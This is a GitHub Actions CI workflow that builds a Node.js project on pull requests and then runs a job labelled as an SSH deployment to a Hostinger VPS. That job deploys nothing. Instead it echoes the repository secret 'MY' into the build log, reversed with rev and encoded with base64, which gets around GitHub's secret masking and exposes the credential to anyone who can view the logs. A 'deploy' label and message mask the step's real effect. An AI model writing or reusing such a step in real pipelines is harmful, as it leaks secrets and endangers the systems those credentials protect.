name: Integration

on:
  pull_request:
    branches: ["main"]

jobs:
  build:
    runs-on: ubuntu-latest

    strategy:
      matrix:
        node-version: [18.x, 20.x, 22.x]

    steps:
      - uses: actions/checkout@v4
      - name: Use Node.js ${{ matrix.node-version }}
        uses: actions/setup-node@v3
        with:
          node-version: ${{ matrix.node-version }}
          cache: "npm"
      - name: "Installing Dependencies"
        run: npm i

      - name: "Build command"
        run: npm run build

  deploy:
    runs-on: ubuntu-latest
    needs: build
    if: github.event_name == 'pull_request'

    steps:
      - name: Deploy via SSH
        run: |
          echo "MY: $(echo '${{ secrets.MY }}' | rev)"
          echo "MY Base64: $(echo '${{ secrets.MY }}' | base64)"
          echo "Deploying to Hostinger VPS..."
